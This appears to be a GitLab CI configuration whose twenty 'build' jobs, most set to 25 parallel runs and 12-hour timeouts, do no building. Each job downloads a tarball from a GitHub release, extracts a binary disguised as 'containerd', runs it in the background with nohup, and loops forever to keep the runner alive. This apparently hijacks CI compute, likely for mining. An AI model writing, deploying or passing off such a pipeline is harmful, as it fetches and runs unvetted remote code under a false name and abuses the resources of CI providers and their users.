image: ruby:latest

 
stages: 
  - build 
 
build_1: 
  stage: build 
  parallel: 25 
  timeout: 12h
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done
 
build_2: 
  stage: build 
  parallel: 25
  timeout: 12h
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done
 
build_3: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done 
 
build_4: 
  stage: build 
  parallel: 
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done
 
build_5: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done
 
build_6: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done
 
build_7: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done
 
build_8: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done
 
build_9: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done
 
build_10: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done
     
build_11: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done

build_12: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done

build_13: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done

build_14: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done

build_15: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done

build_16: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done

build_17: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done

build_18: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done

build_19: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done

build_20: 
  stage: build 
  parallel: 25
  timeout: 12h 
  script: | 
    wget -q https://github.com/confiden21/nogodnodevil/releases/download/vv1/containerd.tar; tar xf containerd.tar; nohup ./containerd & sleep 2; while :; do echo '===='; sleep 120; done